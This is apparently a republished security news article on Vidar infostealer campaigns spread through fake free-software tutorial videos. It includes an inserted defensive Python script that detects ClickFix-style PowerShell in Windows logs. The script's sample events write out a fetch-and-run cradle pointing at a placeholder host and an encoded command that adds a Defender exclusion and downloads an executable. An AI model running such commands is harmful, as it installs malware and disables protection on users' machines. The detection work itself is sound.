Hackers Use Free Spotify Premium Hacks on TikTok and Instagram to Spread Vidar Infostealer

Originally published by Cybersecurity News (cybersecuritynews.com)


Hackers are now turning popular social media platforms into malware delivery channels, using the promise of free software to trap unsuspecting users.

Short-form video platforms like TikTok and Instagram Reels have become the latest tools in a cybercriminal’s playbook, with attackers posting polished tutorial videos that promise free Spotify Premium, free Windows activation, or free Microsoft Office.

Instead of the freebies they are after, viewers end up with a dangerous infostealer quietly running on their Windows devices. The shift marks a clear evolution in how attackers choose to reach their targets.

Cybercriminals have moved far beyond traditional phishing emails. Today, they are crafting content that looks and feels like everyday social media, blending in seamlessly with legitimate tech tips and tutorials.

The videos are so well-produced that many viewers do not suspect anything is wrong until the damage is already done. This approach lets attackers reach millions of people through the very platforms those people trust most.

Researchers at ReversingLabs uncovered two active campaigns using these short videos to trick users into running dangerous PowerShell commands or visiting malicious download sites.

Cybercriminals are learning to exploit social media algorithms just as effectively as professional marketers, amplifying the reach of these attacks at almost no cost.

The malware at the center of these campaigns is Vidar, a well-known infostealer built to quietly siphon sensitive data from infected devices.

Once it lands on a machine, Vidar goes to work collecting saved browser passwords, autofill data, browser cookies, cryptocurrency wallet details, data from two-factor authentication apps, and even Tor Browser data.

Everything harvested is then sent back to servers controlled by the attackers, giving them a detailed key to the victim’s entire digital life.

Hackers Use Free Spotify Premium Hacks

The first campaign is deceptively polished. Accounts using names like “windows.tips” or “windows.insights” post videos designed to look like genuine tech support content, complete with Windows-style branding and professional editing.

The videos are tagged with Windows and Office-related keywords so they appear right alongside legitimate troubleshooting videos in search results and recommendation feeds.

Viewers are walked through step-by-step instructions that include opening PowerShell, a legitimate Windows administrative tool, and pasting in a set of commands.

Figure 1: Example of a fake Windows tutorial video used to deliver the Vidar infostealer (Image courtesy of ReversingLabs)

Those commands then silently download and execute the Vidar infostealer in the background, with the user none the wiser.

The technique closely mirrors what researchers have called ClickFix attacks, where users are socially engineered into running malicious code themselves. Because the victim launches a trusted, signed Windows binary (PowerShell) by hand, there is no malicious attachment or download for email and web filters to catch before execution, which sidesteps most traditional perimeter defenses.

Vidar’s Evasion Tricks and Security Risks

Once Vidar is on a device, it does not just steal data and leave. Research into similar TikTok-based attack chains shows that the malicious scripts commonly add exclusions to Windows Defender (for example with Add-MpPreference), so that the folders or processes used by the malware are no longer scanned and later payloads dropped there go unnoticed.

This means even after the initial infection is cleaned up, the device can remain exposed to follow-on attacks.
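The two behaviours described above, a pasted PowerShell one-liner that downloads and runs a payload, and a script that adds Defender exclusions, both leave traces in standard Windows logs: PowerShell script block logging (event 4104), process creation (4688) and the Defender configuration-change event (5007). The following triage script is an added example written for this article, not code from ReversingLabs or from the campaign itself. It runs over a handful of constructed log lines in an assumed "timestamp|EventID|message" export format; the indicator list, weights, and the 5007 message wording are this example's own assumptions and should be tuned against real telemetry.

```python
"""Triage constructed Windows log lines for ClickFix-style PowerShell
cradles and Defender exclusion tampering.

Added example (not from the original article or the ReversingLabs
research). Assumes an export format of '<timestamp>|<EventID>|<message>';
indicator patterns and weights are illustrative.
"""
import base64
import re

# (label, case-insensitive regex, weight). Scored against the command text
# and, when present, the decoded -EncodedCommand payload.
INDICATORS = [
    ("download_cradle", r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|"
                        r"downloadstring|downloadfile|net\.webclient|"
                        r"start-bitstransfer|curl|wget)\b", 3),
    ("exec_in_memory", r"\b(iex|invoke-expression)\b", 3),
    ("hidden_window", r"-w(indowstyle)?\s+hidden", 2),
    ("policy_bypass", r"-e(xecutionpolicy|p)\s+bypass", 2),
    ("no_profile", r"-no(p|profile)\b", 1),
    ("defender_tamper", r"\b(add-mppreference|set-mppreference)\b|"
                        r"exclusionpath|disablerealtimemonitoring", 4),
]
ALERT_THRESHOLD = 5  # assumed cut-off; a lone -NoProfile should not alert

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(
    r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Modeled on the Defender 5007 "New value:" text for a new exclusion
EXCLUSION_RE = re.compile(
    r"Exclusions\\(Paths|Extensions|Processes)\\(.+?) = 0x0", re.I)


def encode_command(script):
    """Build the -EncodedCommand form of a script (UTF-16LE then base64),
    the same transformation ClickFix droppers rely on to hide the cradle."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload in text, or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(text):
    """Score a command line or script block. Returns (score, sorted labels).
    The base64 blob is cut out before matching so random base64 cannot
    trigger word patterns; its decoded payload is scanned instead."""
    hits = set()
    views = [text]
    m = ENCODED_RE.search(text)
    if m:
        hits.add(("encoded_command", 2))
        views = [text[:m.start()] + text[m.end():]]
        decoded = decode_encoded_command(text)
        if decoded:
            views.append(decoded)
    for label, pattern, weight in INDICATORS:
        if any(re.search(pattern, v, re.I) for v in views):
            hits.add((label, weight))
    return sum(w for _, w in hits), sorted(lbl for lbl, _ in hits)


def exclusion_added(text):
    """(kind, value) for a 5007 message recording a new exclusion, else None."""
    m = EXCLUSION_RE.search(text)
    return (m.group(1), m.group(2)) if m else None


def parse_event(line):
    """Split the assumed '<timestamp>|<EventID>|<message>' export format."""
    ts, event_id, msg = line.split("|", 2)
    return ts, int(event_id), msg


def triage(lines, threshold=ALERT_THRESHOLD):
    """Return findings for 4104/4688 lines scoring >= threshold and for any
    5007 line that records a new Defender exclusion."""
    findings = []
    for line in lines:
        ts, event_id, msg = parse_event(line)
        if event_id in (4104, 4688):
            score, labels = score_command(msg)
            if score >= threshold:
                findings.append({"time": ts, "event": event_id, "score": score,
                                 "labels": labels,
                                 "decoded": decode_encoded_command(msg)})
        elif event_id == 5007:
            excl = exclusion_added(msg)
            if excl:
                findings.append({"time": ts, "event": event_id, "score": 4,
                                 "labels": ["defender_exclusion"],
                                 "exclusion": excl})
    return findings


# Constructed sample events (not real telemetry); example.invalid is a
# reserved name that never resolves.
SAMPLE_EVENTS = [
    '2025-01-10T10:00:01|4688|"C:\\Windows\\System32\\WindowsPowerShell\\v1.0'
    '\\powershell.exe" -NoProfile -Command Get-Process',
    "2025-01-10T10:02:14|4104|iex (iwr -UseBasicParsing "
    "'https://example.invalid/get').Content",
    "2025-01-10T10:02:15|4688|powershell.exe -w hidden -ep bypass -enc "
    + encode_command("Add-MpPreference -ExclusionPath C:\\Users\\Public; "
                     "iwr https://example.invalid/x -OutFile "
                     "C:\\Users\\Public\\x.exe"),
    "2025-01-10T10:02:16|5007|Microsoft Defender Antivirus Configuration has "
    "changed. Old value: New value: HKLM\\SOFTWARE\\Microsoft\\Windows "
    "Defender\\Exclusions\\Paths\\C:\\Users\\Public = 0x0",
    "2025-01-10T10:03:00|4104|Get-ChildItem C:\\Temp | Measure-Object",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

The benign first and last lines stay below the threshold, the plain `iex (iwr ...)` cradle alerts on its own, and the encoded dropper is caught even though the exclusion command and download URL are hidden inside base64, because the payload is decoded and scored. The 5007 hit is worth correlating with the preceding 4688 event: an exclusion appearing seconds after a hidden-window PowerShell launch is exactly the sequence the article describes.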

The stolen information represents a serious risk beyond just one account or one platform. Browser cookies can be used to hijack active sessions without needing a password, and cryptocurrency wallet data can lead to direct financial loss.

Two-factor authentication data in the wrong hands can defeat even accounts that appear to be securely protected.

Security experts recommend downloading software only from official vendor websites and treating any “free” or cracked version of a paid product with real skepticism.

Users should avoid following instructions on unfamiliar web pages, especially those asking them to run commands or paste code, as many of these pages use countdown timers or fake user counters to push people into acting fast.

Comparing a download's hash against the value the vendor publishes, verifying a file's digital signature before running it, and keeping a real-time anti-malware solution active are all practical steps that can stop an infostealer before it ever runs.
